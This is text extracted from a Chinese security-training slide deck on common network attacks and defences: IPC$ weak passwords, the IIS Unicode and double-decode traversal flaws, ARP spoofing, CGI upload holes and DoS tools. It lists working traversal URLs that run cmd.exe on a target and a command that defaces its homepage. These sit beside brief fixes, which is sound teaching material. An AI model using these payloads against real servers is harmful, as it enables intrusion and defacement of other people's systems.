1.常见的攻击和防范.pptVIP

常见的攻击和防范; 前言： 　在网络这个不断更新换代的世界里，网络中的安全漏洞无处不在。即便旧的安全漏洞补上了，新的安全漏洞又将不断涌现。网络攻击正是利用这些存在的漏洞和安全缺陷对系统和资源进行攻击。;蓝盾安全小组;蓝盾安全小组;;;; 一、常见攻击方法 1、弱口令和IPC入侵 IPC是指“Inter Process Communications”,准确的说是ipc$，是默认的在系统启动时的admin共享。 （1）操作系统默认用户 如：GUEST、IWAM_DAMU12A5UQCWDJL （2）应用软件默认用户 如：SQL的SU用户 ;蓝盾安全小组; 二、UNICODE漏洞 UNICODE 漏洞是经常被入侵者利用的 漏洞之一。在2001年5月1日黑客大战中， 黑客们就普遍利用此漏洞对各国网站进行 攻击。; 黑客可以远程通过IIS执行以下命令，列出指定URL中 C：\盘根目录下的所有内容。 /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\+/a 或 /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\+/a 通过相关的操作查得该主机WEB页为： c:\inetpub\wwwroot\default.htm ;下一步是修改主页: http://targetip/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hacked+by+qting++c:\inetpub\wwwroot\default.htm. 修改页面完成，首页改为: hacked by qting 解决办法： A、及时的装补丁 B、关闭没用到的端口 ;IIS unicode 漏洞: /scripts/..%c0%2f..%c0%2f..%c0%2f.. %c0%2f.. /winnt/system32/cmd.exe?/c+dir  /scripts/..%c1%1c..%c1%1c..%c1%1c..%c1%1c../winnt/ system32/cmd.exe?/c+dir  /scripts/check.bat/..%c0%2f..%c0%2f..%c0%2f/winnt/ system32/cmd.exe?/c%20dir%20C:\  /scripts/check.bat/..%c1%1c..%c1%1c..%c1%1c/winnt/ system32/cmd.exe?/c%20dir%20C:\  IIS CGI文件名二次解码漏洞: /_vti_bin/..%%35%63.. %%35%63.. %%35%63..%%35%63..%%35%63../winnt /system32/cmd.exe?/c+dir  /_vti_bin/..%%35c..%%35c.. %%35c..%%35c..%%35c.. /winnt/system32/cmd.exe?/c+dir ;3、ARP欺骗 ARP协议是“Address Resolution Protocol”（地址解析协议）的缩写。在局域网中，网络中实际传输的是“帧”，帧里面是有目标主机的MAC地址的。在以太网中，一个主机要和另一个主机进行直接通信，必须???知道目标主机的MAC地址。 IP地址＜－－－＞ＭＡＣ地址 逻辑地址　　　　物理地址;蓝盾安全小组;3、CGI漏洞攻击 如：UPLOADER.EXE 如果使用WINNT作为WEBSERVER的操作系统，入侵者能够利用UPLOADER.EXE上传任何文件。 解决方法： 将UPLOADER.EXE从WEB目录移走或删除。; 4、拒绝服务攻击 拒绝服务攻击是一种遍布全球的系统漏洞，黑客们正醉心于对它的研究，而无数的 网络用户将成为这种攻击的受害者。 Tribe Flood Network, tfn2k, smurf, targa… 还有许多的程序都在被不断的开发出来。 ;蓝盾安全小组;攻击方式的分类